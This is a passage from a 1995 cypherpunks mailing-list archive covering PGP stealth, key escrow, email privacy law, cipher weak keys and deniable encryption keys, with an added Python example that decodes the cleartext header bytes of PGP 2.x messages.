> to spooks' programmed encryption sniffers - "HEY! I'M PGP -  GIVE ME
> A LOOK!."

As if they couldn't figure it out anyway. It isn't an "RSA signature"
by the way. Read format.doc sometime.

>    When are the PGP designers and coders going to get serious and
> develop STEALTH PGP inside PGP itself!?

Never, I hope. It would dramatically lower the utility of the
system. Can you imagine how disgusting it would be to try decrypting
something if you have a dozen keys outstanding? Not to mention how
hard it would be to deal with figuring out that you should even try to
decrypt things in the first place.

>   So what, -that "only a few companies" will be discovered to be using PGP
> through the RSA signature!? Those few companies are the seeds for the
> vast numbers of companies that would follow them in using PGP over the
> Internet. The RSA signature is the flag that allows the spooks to easily
> net the bold first companies. The RSA signature is greatly impeding the
> spread of PGP use over the Internet. PGP MUST BE STEALTHED!!

It isn't an RSA signature. It's a bunch of magic numbers.

Look, get real already. If someone sees a bunch of random numbers in
mail sent by me, it's going to be pretty obvious what the hell is
inside anyway.

I very much see this whole thing as a non-issue.

Perry
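
The "magic numbers" discussed in this exchange can be decoded by hand. The following is an added example (not part of either message and not PGP source code) that parses an old-format PGP packet header, laid out as in RFC 1991 / RFC 4880 section 4.2, and shows why every message to a 1024-bit RSA key begins with the same three bytes. Assumptions: the three glyphs described above are read as DOS code page 437 bytes 0x84 0x8C 0x03, the sample packets are constructed filler rather than real ciphertext, and all function names are illustrative.

```python
# Added illustration: decode the cleartext prefix of a PGP 2.x public-key-encrypted message.
import hashlib
import struct

TAG_NAMES = {1: "public-key encrypted session key", 2: "signature",
             8: "compressed data", 9: "conventionally encrypted data",
             11: "literal data"}
LENGTH_FIELD_SIZE = {0: 1, 1: 2, 2: 4}  # length-type 3 means indeterminate length


def parse_old_header(data: bytes):
    """Return (tag, body_length, header_length) for an old-format packet header."""
    if len(data) < 2 or not data[0] & 0x80:
        raise ValueError("not a PGP packet: high bit of first byte is clear")
    if data[0] & 0x40:
        raise ValueError("new-format header, not the PGP 2.x layout")
    tag = (data[0] >> 2) & 0x0F          # bits 5-2: packet type
    length_type = data[0] & 0x03         # bits 1-0: size of the length field
    if length_type == 3:
        return tag, None, 1
    size = LENGTH_FIELD_SIZE[length_type]
    if len(data) < 1 + size:
        raise ValueError("truncated length field")
    return tag, int.from_bytes(data[1:1 + size], "big"), 1 + size


def parse_pkesk(body: bytes):
    """Decode the unencrypted fields of a tag-1 (RSA session key) packet body."""
    if len(body) < 12:
        raise ValueError("truncated packet body")
    version, key_id, algorithm = body[0], body[1:9], body[9]
    (mpi_bits,) = struct.unpack(">H", body[10:12])
    if len(body) != 12 + (mpi_bits + 7) // 8:
        raise ValueError("MPI length does not match packet length")
    return {"version": version, "key_id": key_id.hex(),
            "algorithm": algorithm, "mpi_bits": mpi_bits}


def make_sample_packet(key_id: bytes, modulus_bits: int, seed: bytes) -> bytes:
    """Build a CONSTRUCTED tag-1 packet; the MPI is hash filler, not RSA output."""
    if len(key_id) != 8 or modulus_bits % 8:
        raise ValueError("need an 8-byte key ID and a whole number of bytes")
    n = modulus_bits // 8
    filler = b"".join(hashlib.sha256(seed + bytes([i])).digest()
                      for i in range((n + 31) // 32))[:n]
    mpi = bytes([filler[0] | 0x80]) + filler[1:]   # top bit set: bit count == modulus_bits
    # version 3, key ID, algorithm 1 (RSA), MPI bit count, MPI bytes
    body = bytes([3]) + key_id + bytes([1]) + struct.pack(">H", modulus_bits) + mpi
    if len(body) < 256:                            # shortest length field (sample's choice)
        header = bytes([0x80 | (1 << 2) | 0, len(body)])
    else:
        header = bytes([0x80 | (1 << 2) | 1]) + struct.pack(">H", len(body))
    return header + body


def describe(message: bytes):
    """Summarise everything an observer can read without any key."""
    tag, length, header_len = parse_old_header(message)
    info = {"tag": tag, "packet": TAG_NAMES.get(tag, "other"), "body_length": length}
    if tag == 1 and length is not None:
        info.update(parse_pkesk(message[header_len:header_len + length]))
    return info


if __name__ == "__main__":
    # Three constructed recipients with 1024-bit keys: the payloads differ, the prefix does not.
    for i in range(3):
        packet = make_sample_packet(bytes([i]) * 8, 1024, b"seed%d" % i)
        print(packet[:3].hex(), describe(packet))
    # 0x84 = old-format header, tag 1, one-byte length
    # 0x8c = 140 = 1 (version) + 8 (key ID) + 1 (algorithm) + 2 (bit count) + 128 (MPI)
    # 0x03 = version byte
```

The recipient's key ID parsed here also travels in the clear. It is the field that tells a recipient holding several keys which one to use.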




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kelso@netcom.com (Tom Rollins)
Date: Tue, 12 Sep 95 06:48:09 PDT
To: cypherpunks@toad.com
Subject: VCR+ encode/decode source file error.
Message-ID: <199509121345.GAA21447@netcom3.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Hello,

If anyone is interested, the "vcr+.shar.gz" file
from "sable.ox.ac.uk" contains
two (2) source files (encode.c and decode.c).
These source files both have the same small errors.

Change the source line ...
	int	a[12], b[12], out[12] ;
To ...
	int	a[18], b[18], out[18] ;

And change the source line ...
	static	int	start[480], leng[480] ;
To ...
	static	int	start[512], leng[512] ;

-tom <kelso@netcom.com>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: A5113643667@attpls.net (Tom Jones)
Date: Tue, 12 Sep 95 00:15:49 PDT
To: cypherpunks@toad.com (Cypherpunks)
Subject: draft key mgmt props
Message-ID: <3E79EDD0>
MIME-Version: 1.0
Content-Type: text/plain


Dear Cypherpunks,

Does anyone here feel like explaining the situation between the three
key management proposals now at the internet draft stage?

Peace




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Tue, 12 Sep 95 08:24:15 PDT
To: gjeffers@socketis.net
Subject: Re: PGP in UK - snooped as unSTEALTHed?
Message-ID: <9509121520.AA12778@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
>          MICROSOFT VERSUS BORLAND FOR COMPILING/ASSEMBLING PGP

I recently got Symantec C++ 7.0 for less than either Microsoft or Borland
were selling their packages for.  It's a nicer development environment than
either as well.  It also supports DOS/Windows3.x/NT/Chicago. (I don't remember
if it supports OS2.)

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kadie@eff.org (Carl M. Kadie)
Date: Tue, 12 Sep 95 08:24:04 PDT
To: eff-mail-cypherpunks@eff.org
Subject: Re: University logging mail to anon.penet
In-Reply-To: <199509082239.PAA20081@ix8.ix.netcom.com.810600068>
Message-ID: <4348m6$k72@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


stewarts@ix.netcom.com (Bill Stewart) writes:

[...]
>There may be ECPA issues involved, especially if CalPolySLO is a government-
>run university; the sysadmins certainly need to learn some ethics...
[...]

I think the ECPA should apply to private universities, too. The
FERPA also applies to virtually all U.S. private universities.

- Carl

=============== ftp://ftp.eff.org/pub/CAF/faq/email.privacy ===============
q: Can (should) my university monitor my email?

a: Ethically (and perhaps legally) email communications should have
the same privacy protection as telephone calls. It would be unwise for
any university employee to tap email communications without
authorization from the university president, university legal counsel,
and the academic freedom committee. According to Mike Godwin, legal
services counsel for the Electronic Frontier Foundation (EFF), the
U.S.'s Electronic Communications Privacy Act (ECPA) could be
reasonably construed to protect university email. This is also the
reported opinion of the U. of Michigan's lawyers. Also, the U.S.'s
Family Educational Rights and Privacy Act gives students at all public
and most private schools some privacy rights.

A U.S. government task force says that "[Email] monitoring [of
government employees] of actual communications and communicators may
impinge on the Constitutional rights of freedom of speech (1st
Amendment), against unreasonable search and seizure (4th Amendment),
and against self-incrimination (5th amendment), as well as on the
right to privacy, specifically as set forth in both the Privacy Act
and the ECPA."

In the context of libraries, the American Library Association's Policy
on Confidentiality of Library Records suggests this procedure to deal
with an official or police request for information about users:

'When drafting local policies, libraries should consult with their
legal counsel to insure these policies are based upon and
consistent with applicable federal, state, and local law
concerning the confidentiality of library records, the disclosure
of public records, and the protection of individual privacy.

Suggested procedures include the following:

     1.  The library staff member receiving the request to
         examine or obtain information relating to circulation or
         other records identifying the names of library users,
         will immediately refer the person making the request to
         the responsible officer of the institution, who shall
         explain the confidentiality policy.

     2.  The director, upon receipt of such process, order, or
         subpoena, shall consult with the appropriate legal
         officer assigned to the institution to determine if such
         process, order, or subpoena is in good form and if there
         is a showing of good cause for its issuance.

     3.  If the process, order, or subpoena is not in proper form
         or if good cause has not been shown, insistence shall be
         made that such defects be cured before any records are
         released. (The legal process requiring the production
         of circulation or other library records shall ordinarily
         be in the form of subpoena "duces tecum" [bring your
         records] requiring the responsible officer to attend
         court or the taking of his/her deposition and may
         require him/her to bring along certain designated
         circulation or other specified records.)

     4.  Any threats or unauthorized demands (i.e., those not
         supported by a process, order, or subpoena) concerning
         circulation and other records identifying the names of
         library users shall be reported to the appropriate legal
         officer of the institution.

     5.  Any problems relating to the privacy of circulation and
         other records identifying the names of library users
         which are not provided for above shall be referred to
         the responsible officer.'



- Carl M. Kadie

ANNOTATED REFERENCES

(All these documents are available on-line. Access information follows.)

=================<a href="ftp://ftp.eff.org/pub/CAF/law/ecpa.1986.godwin">
law/ecpa.1986.godwin
=================</a>
* Privacy -- E-mail -- ECPA - University Site

Mike Godwin, legal services counsel for the Electronic Frontier
Foundation (EFF), says that the Electronic Communications Privacy Act
(ECPA) could be reasonably construed to protect university email.

=================<a href="ftp://ftp.eff.org/pub/CAF/law/ferpa.text">
law/ferpa.text
=================</a>
* Privacy -- Students -- FERPA (Buckley Amendment)

The full text of the Family Educational Right to Privacy Act
(Buckley Amendment).

=================<a href="http://www.eff.org/CAF/faq/email.policies.html">
faq/email.policies
=================</a>
* Email -- Policies
 
q: Do any universities treat email and computer files as private?
 
a: Yes, many universities treat email and computer files as private.
...

=================<a href="ftp://ftp.eff.org/pub/CAF/library/confidentiality.1.ala">
library/confidentiality.1.ala
=================</a>
* Confidentiality -- 1 (ALA)

The American Library Association's "Policy on Confidentiality of
Library Records"

Suggests how to handle police or official requests for information
about a user.

=================<a href="ftp://ftp.eff.org/pub/CAF/library/computer.draft.ala">
library/computer.draft.ala
=================</a>
* DRAFT: Access to Electronic ... Services and Networks ... (ALA)

A draft interpretation by the American Library Association of the
"Library Bill of Rights"

Says in part: "Libraries and librarians exist to facilitate [freedom
of speech and freedom to read] by providing access to, identifying,
retrieving, organizing, and preserving recorded expression regardless
of the formats or technologies in which that expression is recorded."

=================<a href="ftp://ftp.eff.org/pub/CAF/statements/bill-of-rights.aahe">
statements/bill-of-rights.aahe
=================</a>
* Bill of Rights ... for Electronic ... Learners

This is the "Bill of Rights and Responsibilities for the Electronic
Community of Learners". It could become the first widely endorsed
statement directly related to computers and academic freedom.

=================<a href="ftp://ftp.eff.org/pub/CAF/statements/caf-statement">
statements/caf-statement
=================</a>
* Computer and Academic Freedom Statement -- Draft

This is an attempt to codify the application of academic freedom to
academic computers. It reflects our seven months of on-line discussion
about computers and academic freedom. It covers free expression, due
process, privacy, and user participation.

Comments and suggestions are very welcome (especially when posted to
CAF-talk). All the documents referenced are available on-line.
(Critiqued).

=================<a href="ftp://ftp.eff.org/pub/CAF/statements/caf-statement.critique">
statements/caf-statement.critique
=================</a>
* Computer and Academic Freedom Statement -- Draft -- Critique

This is a critique of an attempt to codify the application of academic
freedom to academic computers. It reflects our seven months of on-line
discussion about computers and academic freedom. It covers free
expression, due process, privacy, and user participation.

Additional comments and suggestions are very welcome (especially when
posted to CAF-talk). All the documents referenced are available
on-line.

=================<a href="ftp://ftp.eff.org/pub/CAF/academic/student.freedoms.aaup">
academic/student.freedoms.aaup
=================</a>
* Student Freedoms (AAUP)

Joint Statement on Rights and Freedoms of Students -- This is the main
U.S. statement on student academic freedom.

=================<a href="ftp://ftp.eff.org/pub/CAF/academic/speech-codes.aaup">
academic/speech-codes.aaup
=================</a>
* Speech Codes (AAUP)

On Freedom of Expression and Campus Speech Codes Expression - An
official statement of the American Association of University
Professors (AAUP)

It says in part: "On a campus that is free and open, no idea can be
banned or forbidden.  No viewpoint or message may be deemed so hateful
or disturbing that it may not be expressed."

=================<a href="ftp://ftp.eff.org/pub/CAF/law/uwm-post-v-u-of-wisconsin">
law/uwm-post-v-u-of-wisconsin
=================</a>
* Expression -- Hate Speech -- UWM Post v. U Of Wisconsin

The full text of UWM POST v. U. of Wisconsin. This recent district
court ruling goes into detail about the difference between protected
offensive expression and illegal harassment. It even mentions email.

It concludes: "The founding fathers of this nation produced a
remarkable document in the Constitution but it was ratified only with
the promise of the Bill of Rights.  The First Amendment is central to
our concept of freedom.  The God-given "unalienable rights" that the
infant nation rallied to in the Declaration of Independence can be
preserved only if their application is rigorously analyzed.

The problems of bigotry and discrimination sought to be addressed here
are real and truly corrosive of the educational environment.  But
freedom of speech is almost absolute in our land and the only
restriction the fighting words doctrine can abide is that based on the
fear of violent reaction.  Content-based prohibitions such as that in
the UW Rule, however well intended, simply cannot survive the
screening which our Constitution demands."

=================<a href="ftp://ftp.eff.org/pub/CAF/law/gillard-v-schmidt">
law/gillard-v-schmidt
=================</a>
* Privacy -- School -- Staff Desk -- Gillard v. Schmidt

Description of an appellate court ruling that the school board could
not search the desk of a school counselor without a warrant.

=================<a href="ftp://ftp.eff.org/pub/CAF/law/email.gov-employee">
law/email.gov-employee
=================</a>
* Privacy -- E-mail -- Government Employees

A U.S. government task force: "[Email] monitoring [of government
employees] of actual communications and communicators may impinge on
the Constitutional rights of freedom of speech (1st Amendment),
against unreasonable search and seizure (4th Amendment), and against
self-incrimination (5th amendment), as well as on the right to
privacy, specifically as set forth in both the Privacy Act and the
ECPA." Enclosed are guidelines for legitimate monitoring of government
employee email.

=================<a href="ftp://ftp.eff.org/pub/CAF/law/mass-student-searches">
law/mass-student-searches
=================</a>
* Privacy -- Mass Students Searches

An excerpt from The ACLU Handbook: _The Rights of Students_, stating that
"there must a reasonable suspicion directed specifically at each student
before a school official can search students."

=================<a href="ftp://ftp.eff.org/pub/CAF/law/constraints.constitutional">
law/constraints.constitutional
=================</a>
* Constitution -- Public University -- Constraints

Comments from _A Practical Guide to Legal Issues Affecting College
Teachers_ by Partrica A. Hollander, D. Parker Young, and Donald D.
Gehring.  (College Administration Publication, 1985).  Discusses the
constitutional constraints on public universities including the
requires for freedom of expression, freedom against unreasonable
searches and seizures, due process, specific rules.

=================<a href="ftp://ftp.eff.org/pub/CAF/law/ecpa.umich">
law/ecpa.umich
=================</a>
* Privacy -- E-mail -- ECPA - University Site

A summary of a newspaper report that the U. of Michigan's lawyers
believe(d) that the institution is barred under the federal Electronic
Communications Privacy Act from reading electronic mail.

=================<a href="ftp://ftp.eff.org/pub/CAF/law/privacy.email">
law/privacy.email
=================</a>
* Privacy -- E-mail -- Law -- Hernandez

"Computer Electronic Mail and Privacy", an edited version of a law
school seminar paper by Ruel T. Hernandez.

=================<a href="ftp://ftp.eff.org/pub/CAF/law/privacy.workplace">
law/privacy.workplace
=================</a>
* Privacy -- Workplace

Comments from and about _The new hazards of the high technology
workplace_ see (1991) 104 _Harvard Law Review_ 1898. Talks about email
and other electronic monitoring.

=================<a href="ftp://ftp.eff.org/pub/CAF/law/email.bib">
law/email.bib
=================</a>
* Privacy -- E-mail -- Bibliography

I have been having an e-mail conversation with Stacy Veeder for several 
days on the topic of e-mail privacy. She mailed me this bibliography
which she has compiled for two papers which she is currently writing.

I post it here with permission.

PS - She is interested in talking with anyone who has some views on the 
topic/information to share.

Mark N.

=================
=================

If you have gopher, you can browse the CAF archive with the command
   gopher gopher.eff.org

These document(s) are also available by anonymous ftp (the preferred
method) and by email. To get the file(s) via ftp, do an anonymous ftp
to ftp.eff.org (192.77.172.4), and then:

  cd  /pub/CAF/law
  get ecpa.1986.godwin
  cd  /pub/CAF/law
  get ferpa.text
  cd  /pub/CAF/faq
  get email.policies
  cd  /pub/CAF/library
  get confidentiality.1.ala
  cd  /pub/CAF/library
  get computer.draft.ala
  cd  /pub/CAF/statements
  get bill-of-rights.aahe
  cd  /pub/CAF/statements
  get caf-statement
  cd  /pub/CAF/statements
  get caf-statement.critique
  cd  /pub/CAF/academic
  get student.freedoms.aaup
  cd  /pub/CAF/academic
  get speech-codes.aaup
  cd  /pub/CAF/law
  get uwm-post-v-u-of-wisconsin
  cd  /pub/CAF/law
  get gillard-v-schmidt
  cd  /pub/CAF/law
  get email.gov-employee
  cd  /pub/CAF/law
  get mass-student-searches
  cd  /pub/CAF/law
  get constraints.constitutional
  cd  /pub/CAF/law
  get ecpa.umich
  cd  /pub/CAF/law
  get privacy.email
  cd  /pub/CAF/law
  get privacy.workplace
  cd  /pub/CAF/law
  get email.bib

To get the file(s) by email, send email to ftpmail@decwrl.dec.com
Include the line(s):

  connect ftp.eff.org
  cd  /pub/CAF/law
  get ecpa.1986.godwin
  cd  /pub/CAF/law
  get ferpa.text
  cd  /pub/CAF/faq
  get email.policies
  cd  /pub/CAF/library
  get confidentiality.1.ala
  cd  /pub/CAF/library
  get computer.draft.ala
  cd  /pub/CAF/statements
  get bill-of-rights.aahe
  cd  /pub/CAF/statements
  get caf-statement
  cd  /pub/CAF/statements
  get caf-statement.critique
  cd  /pub/CAF/academic
  get student.freedoms.aaup
  cd  /pub/CAF/academic
  get speech-codes.aaup
  cd  /pub/CAF/law
  get uwm-post-v-u-of-wisconsin
  cd  /pub/CAF/law
  get gillard-v-schmidt
  cd  /pub/CAF/law
  get email.gov-employee
  cd  /pub/CAF/law
  get mass-student-searches
  cd  /pub/CAF/law
  get constraints.constitutional
  cd  /pub/CAF/law
  get ecpa.umich
  cd  /pub/CAF/law
  get privacy.email
  cd  /pub/CAF/law
  get privacy.workplace
  cd  /pub/CAF/law
  get email.bib
-- 
Carl Kadie -- I do not represent EFF or my employer; this is just me.
 =Email: kadie@eff.org, kadie@cs.uiuc.edu =
 =URL: <http://www.eff.org/CAF/>, <ftp://ftp.cs.uiuc.edu/pub/kadie/> =




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Tue, 12 Sep 95 01:05:41 PDT
To: cypherpunks@toad.com
Subject: anyone got a cpunk URL for the UK munitions T?
Message-ID: <24928.9509120805@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



On the subject of the UK printing of the munitions T-shirt, I've got a
problem, I would like to put a URL for how to obtain the T-shirts, and
cypherpunk political material, anti ITAR, clipper etc, but yet I can't
very well put my URL:

	http://www.dcs.ex.ac.uk/~aba/rsa/

because that may possibly move within a year, maybe sooner, and
T-shirts are so permanent :-(

It seems like too good an opportunity to miss, as some people may get
the thing nice publicity, and interest in the cypherpunks take on
encryption, so it would be ideal to have an on-line reference on the
shirt.

So what I was thinking is it would be nice if someone with a permanent
URL, could put a pointer to my URL, that could be updated later, as my
URL moves?

A cypherpunks page which has been and will be around for a *long time*
with lots of info or pointers to info on ITAR, the evils of key escrow
etc would be ideal.

I don't need the WWW space for the actual info as such, just a pointer
which can point to where-ever it is my URL moves to, and as most
cpunks URLs seem to be in the US, it wouldn't be a v good idea to put
my content on a US server anyway (arguably).

Any offers?

Also now I'm here, there were a few people on the list who ordered
shirts from me, and the progress has been slow, if you want to see the
reasons, and up-to-date state of progress, take a look at:

	http://www.dcs.ex.ac.uk/~aba/uk-shirt.html

I need to decide soon as to what URL to print, I was otherwise
thinking of removing the URL, as my sys admin made some strange
cryptic comment about me not having my URL after a while anyway (when
I finish the course, pointed comment? who knows), and I thought it
might not go down too well if I printed my URL on the T-shirt, at least
if it's an indirect pointer I have the option to get alternate WWW
space.

I have decided to switch printers as the last guy seems to have
vanished, no answers to messages on answer phone for > 1 week, and
some shirt printers (like the new one I've chosen) offer to do the whole
job in a week, and people are getting impatient for their shirts.  So
I ideally need a commitment of a URL so that I can modify the design &
send off to this new printers tonight.

The main criteria, apart from a nice selection of links (I've got ITAR
and cpunk links already anyway) is that the URL pointing at my roving
URL is going to stay there for a few years, at least.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian D Williams <talon57@well.com>
Date: Tue, 12 Sep 95 09:20:43 PDT
To: cypherpunks@toad.com
Subject: Elliptic Curve Public Key Crypto
Message-ID: <199509121620.JAA08381@well.com>
MIME-Version: 1.0
Content-Type: text/plain




Mike Rosing writes:

>in the cypherpunks ftp site /pub/cypherpunks/ciphers are 2 ascii
>files. One contains code and the other contains documentation:
>eliptic.src and elliptic.doc.  The code portion is a cat'ed block
>of files: headers, C sources and a set of prime numbers.  The
>documentation attempts to explain the math, but it does help if
>you already know number theory.  It hopefully isn't necessary.
 
 Thanks Mike for all your effort!!

 Now could someone remind me where the Cypherpunks FTP site is?

 Please?

Brian D Williams
Cypherpatriot

 " Zen? Well it beats sitting around on your ass all day doing
   nothing! "





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Tue, 12 Sep 95 07:58:34 PDT
To: aba@dcs.exeter.ac.uk
Subject: Re: anyone got a cpunk URL for the UK munitions T?
In-Reply-To: <24928.9509120805@exe.dcs.exeter.ac.uk>
Message-ID: <Pine.SUN.3.90.950912095153.27787A-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


I would be more than happy to set up a page for it or any other cypherpunk
material at underground.org. I've been meaning to do some major updates
anyway, just been very busy.

Aleph One / aleph1@dfw.net
http://underground.org/

On Tue, 12 Sep 1995 aba@dcs.exeter.ac.uk wrote:

> So what I was thinking is it would be nice if someone with a permanent
> URL, could put a pointer to my URL, that could be updated later, as my
> URL moves?
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: adwestro@ouray.cudenver.edu (Alan Westrope)
Date: Tue, 12 Sep 95 08:59:10 PDT
To: cypherpunks@toad.com
Subject: Re: Phil Zimmermann/Amnesty International?
In-Reply-To: <199509021658.MAA29224@frankenstein.piermont.com>
Message-ID: <6aaVwkkAseQS084yn@ouray.cudenver.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 02 Sep 1995, "Perry E. Metzger" <perry@piermont.com> wrote:
> Alan Westrope writes:
      [replying to M. Froomkin about statute of limitations for prz]
> > June '96.  Zimmermann and Dubois appeared on a local talk radio show
> > recently; a friend happened to catch the program, taped it, and played
> > excerpts at a Cypherpunks meeting.  This date was mentioned by Phil Dubois.

> That's not possible. The offense in question took place on or before
> September 8, 1992, and the statute of limitations is, to my knowledge,
> three years. Even if it were four years, it would have to be September
> 8th of that year.  Branko Lankester announced availability of PGP 2.0
> on Mon, 7 Sep 1992 at about 20:22 GMT, so since the allegation is that
> he exported PGP Version 1.0 to the team that developed PGP 2.0
> overseas, any export that Phil performed would have of necessity to
> have taken place before then.

Perry's response and Brian Davis' remarks about prosecutorial "creativity"
prompted me to ask Phil Dubois for clarification.  (I told him I would
probably pass his reply along to the list, so I'm not violating email
confidentiality here.)  Here's the relevant snippet:

========================================================================

I believe that the statute expires in June of '96, because there is a
five-year statute on the export-violation allegation and because PGP was
released in June of '91, and whoever exported it did so shortly after the
release.  It is true, however, that prosecutors have been very creative in
extending the statute when they've felt the need to do so.  We can only
hope that DOJ will not feel the need in this case.

========================================================================

I also feel Phil will be largely off the hook by June.  It would be
damn silly to prolong the matter, especially since the complete source
code has been published internationally in OCR format now.  Also, I
expect the Feds would rather focus their "creative" energies on the
Bernstein/EFF export issue.

But who knows what anti-crime hysteria might be whipped up in an
election year, or who it might become handy to demonize, etc.


Alan Westrope                  <awestrop@nyx10.cs.du.edu>
__________/|-,                 <adwestro@ouray.cudenver.edu>
   (_)    \|-'                  2.6.2 public key: finger / servers
PGP 0xB8359639:  D6 89 74 03 77 C8 2D 43   7C CA 6D 57 29 25 69 23

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: I *swear* I have not used the term 'big-endian' in the last 10 years.

iQCVAwUBMFWsMlRRFMq4NZY5AQHTgQP8DFDKtcK3JfFffURlwwXP+o+PMkk57dO2
baWIaBBSRxp0pUivP+vVDSP1NwMhpRDt+apW10qCgemJWgGlg8f2NRW6rq2LgpfJ
1fuJJL/mLQo2W+UfGqQS8PFv3CwvFLdE1hEMQfysFGo3UY2nYOeuMe8vJdednFP2
MSm7B2e9JcM=
=SOsn
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Limpert" <johnl@radix.net>
Date: Tue, 12 Sep 95 07:32:41 PDT
To: "thad@hammerhead.com>
Subject: RE: 64 bit crypto
Message-ID: <01BA80F9.97A820A0@dialin18.annex1.radix.net>
MIME-Version: 1.0
Content-Type: text/plain


<code deleted>

>Then the prepare_key routine would take much much longer.
>
>The idea is that a 64 bit crypto routine can be arbitrarily
>secure against brute-forcing, if you are willing to pay a
>runtime penalty every time you use it.

My thought was that there might be shortcuts that the attacker
could use to compute the permutation of the state array in less time.

I wrote a small test program to look for cycles and weak keys in the
65536 iteration permutation. I assumed a 40 bit key. One weak key
was found, 0x0101010101, that produces a 255 iteration cycle.
375 randomly chosen keys were tested and no cycles were found.

There ought to be a faster way to compute the permutation with
a more analytical approach. My skepticism tells me that nothing
is a replacement for more key bits.

In a semi-related question, why don't we see Feistel systems with
larger numbers of rounds? Would a modified DES with 256 rounds be
any more secure than standard DES?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 12 Sep 95 07:58:25 PDT
To: Brian Davis <bdavis@thepoint.net>
Subject: Re: GAK
Message-ID: <199509121457.KAA28748@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:25 PM 9/3/95 -0400, Brian Davis wrote:

>I, of course, know of the "dislike" of GAK here.  I am curious to know, 
>however, if the "dislike" is because government would have access under 
>any circumstances or if the primary worry is that government will cheat 
>and get access when most would agree that they shouldn't (either by the 
>judge "cheating" or a TLA stealing it).

Individuals will have their individual objections.  My objections are that I
don't like governments spending tax money that they don't absolutely have
to.  Their own survival is *not* a necessity.  I think controlling people's
speech is a waste of money.  Very few Common Law crimes (ie real crimes) are
dependent on wiretap evidence for solution.  Only phoney bureaucratic crimes
(the retail pharmaceutical trade, insider trading, gambling, conspiring to
overthrow the government, etc) need wiretaps. 

My second objection is the control of people's speech.  If I communicate
with someone, I want to communicate with *them*.  I don't want to
communicate with the Feds.  The Supremes have held that the right to speak
includes the right not to be forced to speak.  By implication, I would argue
that I have the right to choose my own channels of communication including
my intended audience (and this has been upheld by the Supremes in other
contexts).

If the Feds want to know what I've written or said (non-publicly) let them
subpoena me and I will be happy to tell them to go to hell.

If we can deploy technologies to protect our freedom to communicate the way
*we* choose to, then we have the right to do so.  Beyond rights, we have the
power to do so --- which is worth even more.

>In other words ... if it took agreement by a review board composed of 
>non-LEA members of this list, would the escrow be acceptable??

I don't think many of us would feel better if a private party had to approve
the invasion of our privacy.

DCF

"You can ignore all of the rest of bullshit.  All that you need to know
about an enemy is how many guns and men does he have and can they stand fire."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Henry W. Farkas" <hfarkas@ims.advantis.com>
Date: Tue, 12 Sep 95 08:00:24 PDT
To: cypherpunks@toad.com
Subject: Re: Scientology tries to break PGP - and
Message-ID: <Pine.A32.3.91.950912104706.38129A-100000@pangloss.ims.advantis.com>
MIME-Version: 1.0
Content-Type: text/plain



Repost: the following bounced:
-----------------------------------------------------------------------------

On Fri, 8 Sep 1995, Tom Rollins wrote:

> If Larry Wollersheim does have the valid key.  It would be a simpler
> process to know what fake key to use and work it backwards through
> the MD5 to arrive at an ascii string to produce the fake key.
>
> Too bad this wouldn't be plausible for the secret ring.  Perhaps PGP
> needs an option to specify the key in Hex and make the process easy.

Here's another option.  I have no idea if it is possible, nor how it would
be implemented!  PGP could allow for an alternate secret key and a
standard "dummy" document from somewhere in your path.  A command line
option would encrypt for both keys (as if there were 2 recipients) and
append the "dummy" document to the end of the target file when encrypting. 

When the safety is finally removed from the gun at your head (sorry for
the drama) you hand over your alternate secret key.  If decrypted with the
"alternate" or "fake" secret key, the encrypted file is wiped until it
reaches a marker; the remainder of the file is displayed.  If you use your
"primary" or "real key", the extraneous text is simply stripped. 

Alternately, the "dummy" file could overwrite the "real" message n times, 
to keep the decrypted file size more realistic.

If you are forced to turn over keys some day (and I think there is at
least a reasonable likelihood of that) then They will have a much harder
time arguing "But that's not what the file *really* said and, deep inside
of me, I know it!".  At that point, with a secure wipe going on while the
"decryption" was taking place, you have done the best you could.  I agree-
a search warrant gives authorities the right to search your home (or
disk)- not a guarantee that they'll find what they're looking for. 

===========================================================================
     Henry W. Farkas      |      Me?    Speak for IBM?    Fat chance.
 hfarkas@ims.advantis.com |------------------------------------------------
   hfarkas@vnet.ibm.com   |     http://newstand.ims.advantis.com/henry
      henry@nhcc.com      |          http://www.nhcc.com/~henry
- ---------------------------------------------------------------------------
PGP 6.2.2 Key fingerprint: AA D0 F5 44 C1 8C 11 52  B3 80 34 1C CE 38 EC 53
 Public key at: pgp-public-keys@pgp.mit.edu, and other popular key servers.
- ---------------------------------------------------------------------------
Brought to you by Henry's Hardware: Home of the Pretty Good Hack "We're not
  fast, but it's not bad, and we're cheaper than the guy down the street!"
===========================================================================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 12 Sep 95 08:00:21 PDT
To: cypherpunks@toad.com
Subject: NRO_puf
Message-ID: <199509121500.LAA08738@pipe2.nyc.pipeline.com>
